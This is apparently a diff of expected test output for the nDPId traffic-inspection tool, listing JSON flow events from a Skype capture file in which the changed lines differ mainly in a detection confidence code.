+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 